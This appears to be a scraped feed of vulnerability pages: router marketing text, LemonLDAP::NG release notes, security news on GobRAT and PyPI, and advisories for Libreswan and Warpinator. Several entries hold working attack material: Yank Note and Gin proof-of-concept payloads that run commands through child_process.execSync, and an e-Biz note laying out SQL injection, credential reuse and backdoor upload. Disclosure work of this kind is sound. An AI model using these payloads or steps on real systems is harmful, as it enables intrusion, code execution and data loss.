A directory traversal vulnerability on Mercury MAC1200R devices allows attackers to read arbitrary files via a web-static/ URL.

*   专题介绍

*   参数详情

**1200M 11AC产品性价比对比表**

**没有好天线  哪有好信号****4根高增益外置天线，科学天线布局，提高天线间隔离度，降低干扰，  
信号更强，覆盖更广**

**不同天线信号强度对比图**

**不同天线信号覆盖范围对比图**

**没有好散热，哪来稳定性**

**没有好界面，哪有好体验**

独有域名登录方式，拥有您专属的melogin.cn

简易网络设置向导，让您只需3步即可快速上网

常规设置与高级设置的分层管理，限速，踢掉蹭网都可随心所欲

**端口,待到用时方恨少**

**实测性能对比图****水星MAC1200R性能高人一筹**

**水星MAC1200R精心设计**

回到顶部

CVE-2021-27825: MAC1200R - 水星网络官方网站

In LemonLDAP::NG (aka lemonldap-ng) before 2.0.7, the default Apache HTTP Server configuration does not properly restrict access to SOAP/REST endpoints (when some LemonLDAP::NG setup options are used). For example, an attacker can insert index.fcgi/index.fcgi into a URL to bypass a Require directive.

This release contains some security fixes, including CVE-2019-19791

This new release fixes more than 60 issues. Here are some of bugfixes and improvements of this release:

*   Security:
    *   \[Security: medium, CVE-2019-19791\] Apache access rules and SOAP/REST endpoints
    *   \[Security:medium\] Redirection in OpenID Connect is granted by default if no URI defined in oidcRPMetaDataOptionsRedirectUris
    *   \[Security:low\] afterData plugins (grantSession) cannot prevent session establishment when 2FA is in use
*   Bugs:
    *   Issuer urldc is lost after error in 2F flow or notification flow
    *   Outgoing emails are missing a Date: field
    *   Zimbra preauth not working
    *   REST config service not working
    *   Server Error with OpenID Connect register endpoint
    *   Manager version comparator does not work with minified JS
    *   Reset expired password doesn't trigger when using Combination
    *   Kerberos not working with session upgrade
    *   After temporary ldap failure, ldap connections stop working forever
    *   Authenticating with external OpenID Connect Provider fails because of special chars in user name
*   Improvements:
    *   Possibility to configure new plugins in Manager
    *   Append overScheme for persistent sessions
    *   Allow differents type of managerDN
    *   Append a requiredAuthenticationLevel option for each uri
    *   Add an option to force claims in ID token
    *   Possibility to set attributes and extra claims in OIDC registration endpoints
    *   Specific message and error code for 2F failure
*   New features:
    *   Add per-service macros
    *   New script to convert sessions between backends
    *   Renew Captcha button
    *   Provide refresh tokens in OpenID Connect
    *   Certificate reset by mail
    *   Possibility to view/close other sessions opened for the same user
    *   Create a web service for "refresh my rights"

The full changelog can be seen here: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/milestones/69

**Upgrade notes**: https://lemonldap-ng.org/documentation/latest/upgrade#section207

**Download**: https://lemonldap-ng.org/download

They made this release:

*   Core team: Maxime Besson, Xavier Guimard, Christophe Maudoux and Clément Oudot
*   Organizations : Gendarmerie Nationale, Worteks, CNAMTS, Orange, CSTB, Urgences Santé Québec, FER Genève, Linagora, SITIV, Métropole Européenne de Lille
*   Community (issues opening, tests, patches, pull requests) :  David Coutadeur, Andreas Deschka,  Daniel Berteaud, Grégory Roy, Antoine Rosier, Mickael Bride, Vincent Filali-Ansary, Dave Conroy, Julien Ledoux, Louis Chemineau, Vincent Mazenod, Xavier Bachelot

If you use LemonLDAP::NG and enjoy it, please let us know:

*   https://lemonldap-ng.org/references
*   https://www.openhub.net/p/lemonldap-ng
*   http://alternativeto.net/software/lemonldap-ng/
*   https://comptoir-du-libre.org/softwares/view/101
*   https://framalibre.org/content/lemonldapng
*   http://twitter.com/lemonldapng
*   https://www.facebook.com/lemonldapng/

CVE-2019-19791: OW2 Projects - LemonLDAP::NG 2.0.7 is out! (lemonldap-ng.lemonldap-ng-2-0-7-is-out)

It appears that sites designed by e-Biz Technocrats Pvt.Ltd suffer from a remote SQL injection vulnerability. As they do not provide any sort of versioning with their offerings, the researcher was unable to provide affected versions. Versions as of May 11, 2023 were affected.

    # Exploit Title: Sql Injection on one site credentials can be use on other sites- Google Dork:" Designed and Developed by e-Biz Technocrats Pvt.Ltd "- Date: 05/11/2023- Exploit Author: K1LL3rB4LL- Tested on: Mac, Windows, LinuxDescription:The vulnerability found is an SQL injection. You may run the site thru automated sql injection or manually doing sql injection once the credentials gathered you do your reverse ip to check your other website.Vuln colum count: 5Vuln colum : 3,4Type of Sql : WAFUsername: adminPassword: 123456admin panel: site.com/adminDetails: After gathering information from sql injection from site a site (site A) you may use the said credentials to access other websites on the same ip or with the same developer if you managed to get an access and upload a php script or backdoor. You may access other sites on their public_html or that is connected on their website which share the same server and if your going to look at the sites they share the same common developer. In some sites that don't have the same credentials you still do the same sql injection with the same colum count, vuln colum number and database where they store the admin credentials.

e-Biz Technocrats Pvt.Ltd SQL Injection

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT.
"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.
The compromise of an internet-exposed router is followed by the

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called **GobRAT**.

"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.

The compromise of an internet-exposed router is followed by the deployment of a loader script that acts as a conduit for delivering GobRAT, which, when launched, masquerades as the Apache daemon process (apached) to evade detection.

The loader is also equipped to disable firewalls, establish persistence using the cron job scheduler, and register an SSH public key in the .ssh/authorized\_keys file for remote access.

GobRAT, for its part, communicates with a remote server via the Transport Layer Security (TLS) protocol to receive as many as 22 different encrypted commands for execution.

Some of the major commands are as follows -

*   Obtain machine information
*   Execute reverse shell
*   Read/write files
*   Configure new command-and-control (C2) and protocol
*   Start SOCKS5 proxy
*   Execute file in /zone/frpc, and
*   Attempt to login to sshd, Telnet, Redis, MySQL, PostgreSQL services running on another machine

The findings come nearly three months after Lumen Black Lotus Labs revealed that business-grade routers have been victimized to spy on victims in Latin America, Europe, and North America using a malware called HiatusRAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New GobRAT Remote Access Trojan Targeting Linux Routers in Japan

The Python Package Index (PyPI) announced last week that every account that maintains a project on the official third-party software repository will be required to turn on two-factor authentication (2FA) by the end of the year.
"Between now and the end of the year, PyPI will begin gating access to certain site functionality based on 2FA usage," PyPI administrator Donald Stufft said. "In addition

Supply Chain / Programming

The Python Package Index (PyPI) announced last week that every account that maintains a project on the official third-party software repository will be required to turn on two-factor authentication (2FA) by the end of the year.

"Between now and the end of the year, PyPI will begin gating access to certain site functionality based on 2FA usage," PyPI administrator Donald Stufft said. "In addition, we may begin selecting certain users or projects for early enforcement."

The enforcement also includes organization maintainers, but does not extend to every single user of the service.

The goal is to neutralize the threats posed by account takeover attacks, which an attacker can leverage to distribute trojanized versions of popular packages to poison the software supply chain and deploy malware on a large scale.

PyPI, like other open source repositories such as npm, has witnessed innumerable instances of malware and package impersonation.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

Earlier this month, Fortinet FortiGuard Labs discovered over 30 Python libraries that incorporated various features to connect to arbitrary remote URLs and steal sensitive data from compromised machines.

The development comes nearly a year after PyPI made 2FA mandatory for critical project maintainers. The registry is home to 457,125 projects and 704,458 users.

According to cloud monitoring service provider Datadog, 9,580 users and 4,541 projects have been identified as critical, with 2FA enabled in total for 38,248 users to date.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

PyPI Implements Mandatory Two-Factor Authentication for Project Owners

Categories: News
Tags: Cisco

Tags:  Zyxel

Tags:  ChatGPT

Tags:  Malvertising

Tags:  Apple

Tags:  Google

Tags:  insider threat

Tags:  Pentagon explosion

Tags:  CISA

Tags:  ransomware guide

Tags:  Rheinmetall

Tags:  BlackBasta

Tags:  WordPress

A list of topics we covered in the week of May 22- 28 of 2023



(Read more...)




The post A week in security (May 22-28) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (May 22-28)

Yank Note (YN) 3.52.1 allows execution of arbitrary code when a crafted file is opened, e.g., via nodeRequire('child_process').

    # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution# Date: 2023-04-27# Exploit Author: 8bitsec# CVE: CVE-2023-31874# Vendor Homepage: yank-note.com# Software Link: https://github.com/purocean/yn# Version: 3.52.1# Tested on: [Ubuntu 22.04 | Mac OS 13]Release Date: 2023-04-27Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacementTechnical Details & Description:A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.Proof of Concept (PoC):Arbitrary code execution:Create a markdown file (.md) in any text editor and write the following payload.Mac:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">Ubuntu:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">Opening the file in Yank Note will auto execute the Calculator application.

CVE-2023-31874: Yank Note 3.52.1 Arbitrary Code Execution ≈ Packet Storm

pluto in Libreswan before 4.11 allows a denial of service (responder SPI mishandling and daemon crash) via unauthenticated IKEv1 Aggressive Mode packets. The earliest affected version is 3.28.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Release date: Wednesday, May 3, 2023 Contact: security@libreswan.org PGP key: 907E790F25C1E8E561CD73B585FF4B43B30FC6F9 =========================================================================== CVE-2023-30570: Malicious IKEv1 Aggressive Mode packets can crash libreswan =========================================================================== This alert (and any updates) are available at the following URLs: https://libreswan.org/security/CVE-2023-30570/ The Libreswan Project was notified by github user "XU-huai" of an issue with receiving a malformed IKEv1 Aggressive Mode packet that would cause a crash and restart of the libreswan pluto daemon. When sent continuously, this could lead to a denial of service attack. Vulnerable versions : libreswan 3.28 - 4.10 Not vulnerable : libreswan 3.0 - 3.27, 4.11+ Vulnerability information ========================= When an IKEv1 Aggressive Mode packet is received with only unacceptable crypto algorithms, the response packet is not sent with a zero responder SPI. When a subsequent packet is received where the sender re-uses the libreswan responder SPI, the pluto daemon state machine crashes. No remote code execution is possible. Exploitation ============ This vulnerability requires that pluto is configured with at least one potentially matching IKEv1 Aggressive Mode connection. Per default, pluto only accepts IKEv2 packets. When IKEv1 is enabled, only Main Mode packets are accepted unless the connection is configured explicitely with aggressive=yes or via its older name aggrmode=yes. When an IKEv1 Aggressive Mode connection is enabled, a malicious peer needs to send an IKEv1 Aggressive Mode packet with an unsupported algorithm, such as DH2. Then the malicious peer needs to be able to receive the reply so it can resend the packet with the received responder SPI added to cause the libreswan pluto daemon to crash and restart. The vulnerable code has been in the code base since 2003 (then still named "openswan") but only became reachable since an IKEv1 Aggressive Mode change that was introduced in libreswan 3.28. Workaround ========== IKEv1 Aggressive Mode connections could be converted to IKEv2 or IKEv1 Main Mode connections. If this is not feasable, patching or upgrading is the only other alternative. History ======= \* 2003 Vulnerable code introduced in openswan-1.0.0 but unreachable \* 2022-04-25 IKEv1 Aggresive Mode change caused vulnerable code to be reachable \* 2023-03-16 Initial report via https://github.com/libreswan/libreswan/issues/1039 \* 2023-04-16 Prerelease of CVE notification and patches to support customers \* 2023-05-03 Release of patch and libreswan 4.11 Credits ======= This vulnerability was found and reported by github user XU-huai Upgrading ========= To address this vulnerability, please upgrade to libreswan 4.11 or later. For those who cannot upgrade, patches are provided at the above URL. About libreswan (https://libreswan.org/) ======================================== Libreswan is a free implementation of the Internet Key Exchange (IKE) protocols IKEv1 and IKEv2. It is a descendant (continuation fork) of openswan 2.6.38. IKE is used to establish IPsec VPN connections. IPsec uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks. Everything passing through the untrusted network is encrypted by the IPsec gateway machine, and decrypted by the gateway at the other end of the tunnel. The resulting tunnel is a virtual private network (VPN). Patches ======= Due to the size of the patch, it is not included inline to this advisory. -----BEGIN PGP SIGNATURE----- iQJHBAEBCgAxFiEEkH55DyXB6OVhzXO1hf9LQ7MPxvkFAmRSzNYTHHRlYW1AbGli cmVzd2FuLm9yZwAKCRCF/0tDsw/G+Z88D/9YuPoEvk7cMrSN7jV0z9liNiAR/gYB gj8CjXkIw4mNaQIcpvhArlFMYov0MXh+nOJDiALx6/dsb6nvgzg/vvVOSU5jSRtg cEC8STA/rvLRSlj5mChKNAayVUmSgOxSg4AFr6zvG+/iQzC3vT2mlmwLXVKw5F+n Nn00Ov1EklqCRlSBUYhuKY2zyhRfxPajZW9s8VcKiUs36qzTjjp/EsUTln3uNHk4 nFIL+6cxEkUIVKtfZVpoB/zLg73tsnUEAdKeXl0H3BqLLohrbkPNEYh7HZsxrD1v g8Z/omf41wfN9p/JJkMK84qN55Nis90TiU5esf4gnl0vOf1dH4vMd7a082ee07UC wPeDL2zpxviIGdnFFzXOnlj88Xa7FsAcB7XU5wcpQcN9GFn8YbiSQvRbKFrrmpNf 10JXYPbMTze8QdrXI4E6mXGbgs9i4BxqYNrSFv0Xuyth+LSAL499adH+SZcG0kc2 XiQ1ZmGqBtQg68CPUdhuP1C4mixwTZ6wJQOyZlagebTDgJVPx52aSYAqoeakTzJ5 YpnVsYBbZXRZTvRasR9sdLp6ZiIzmIy3TF40GwoKvVWKburAaLp53FW2/s5Tvb5G BzlFcusnGd4xteUQklfOow4NJZZxUlEljQgu+yKZaNziYngaFwsy/shfM3STNlth 1mSorpVmVanqiw== =DgY+ -----END PGP SIGNATURE-----

CVE-2023-30570

Warpinator before 1.6.0 allows remote file deletion via directory traversal in top_dir_basenames.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 26 Apr 2023 11:54:38 +0200
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: Warpinator: Remote file deletion vulnerability (CVE-2023-29380)

Hi list,

this report is about a remote file deletion vulnerability in Warpinator
\[1\].

Introduction
============

I already reviewed and found issues in Warpinator a while ago \[2\]. The
openSUSE packager for Warpinator asked me for a follow-up review after
updating to upstream release 1.4.3 which contained the fixes for
CVE-2022-42725.

In the course of the review I found another vulnerability which is
described in detail in the next section.

The Vulnerability
=================

In the code base of version 1.4.3 the sender of a file also sends a list
of \`top\_dir\_basenames\` to the peer. While there is now a verification of
the \`relative\_path\` on the receiving side, the \`top\_dir\_basenames\` are
not verified at all. In \`FileReceiver.\_\_init\_\_()\` the following code is
found:

\`\`\`
    for name in op.top\_dir\_basenames:
        try:
            path = os.path.join(self.save\_path, name)
            if os.path.isdir(path): # file not found is ok
                shutil.rmtree(path)
            else:
                os.remove(path)
        except FileNotFoundError:
            pass
        except Exception as e:
            logging.warning("Problem removing existing files.  Transfer may not succeed: %s" % e)
\`\`\`

If the sender is passing a string like "../" as part of
\`top\_dir\_basenames\` then this code will delete the complete parent
directory of the download directory (by default ~/Warpinator) and thus
the complete home directory of the receiving party. Any other files
under control of the receiving party are similarly endangered by this
remote DoS / integrity attack.

This can happen automatically if the receiving side is running
Warpinator in trusted mode, both parties share the same non-default
group key and unconfirmed file overwrites are allowed. If this is not
the case then the receiving side will see a confirmation popup like

    X wants to send \`../´

This message might not be very suspecting for an average end user. Other
strings can be used here as well like an absolute path to the user's
home directory, which could be interpreted as correct, or overlooked.

I investigated whether the fact that this allows to delete the download
directory completely could lead to a follow-up vulnerability to allow
overwriting files in other paths again. This seems not to be possible
though.  The check of the \`relative\_path()\` is stable enough to prevent
this even if the download directory does not exist at all.

Affectedness
============

The problematic handling of \`top\_dir\_basenames\` was first introduced in
upstream version 1.0.7.

Bugfixes
========

The remote file deletion vulnerability has been fixed upstream via
commit 9aae768 \[3\].

The fact that this vulnerability escaped both upstream's and my own
review efforts during handling of CVE-2022-4272 confirmed earlier
concerns I had about relying on a single line of defense in the
Warpinator codebase. I recommended to upstream to use an isolation
technique like Linux mount namespaces to prevent escapes from the
destined download directory. In the light of this new security issue I
additionally or alternatively recommended a redesign of the codebase to
better separate trusted and untrusted codepaths.

Upstream used the 90 days embargo time we offered to implement isolation
mechanisms either based on Linux namespaces through the Bubblewrap tool,
or based on the Linux kernel's landlock security module. Only if none of
both can be established, Warpinator will run in a legacy mode. In
this case the user will be warned about the weakened security.

The new Warpinator major version release 1.6.0 contains both the bugfix
for this the remote file deletion issue as well as the added security
layers.

Timeline
========

2023-01-25: I reported the newly found issue to upstream and offered
            coordinated disclosure.
2023-03-08: Upstream shared the core changes listed above with us, I
            reviewed them and gave feedback.
2023-04-05: I received CVE-2023-29380 from Mitre to track the file
            deletion issue and shared it with upstream.
2023-04-25: Upstream needed additional time for testing and integration.
            The 90 days maximum embargo period we offer ends and with
	    the 1.6.0 release being available we agreed on the
	    publication of all available information.

References
==========

\[1\]: https://github.com/linuxmint/warpinator
\[2\]: https://seclists.org/oss-sec/2022/q4/38
\[3\]: https://github.com/linuxmint/warpinator/commit/9aae768522b7bbb09c836419893802a02221d663

Best Regards

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Security Engineer
https://www.suse.com/security
GPG Key ID: 0x14C405C971923553
 
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (834 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-29380: security - Warpinator: Remote file deletion vulnerability (CVE-2023-29380)

Gin 0.7.4 allows execution of arbitrary code when a crafted file is opened, e.g., via require('child_process').

    # Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution# Date: 2023-04-24# Exploit Author: 8bitsec# CVE: CVE-2023-31873# Vendor Homepage: https://github.com/mariuskueng/gin# Software Link: https://github.com/mariuskueng/gin# Version: 0.7.4# Tested on: [Mac OS 13]Release Date:2023-04-24Product & Service Introduction: Javascript Markdown editor for MacTechnical Details & Description:A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.Proof of Concept (PoC):Arbitrary code execution:Create a markdown file (.md) in any text editor and write the following payload:<video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">Opening the file in Gin will auto execute the Calculator application.

Tag

#mac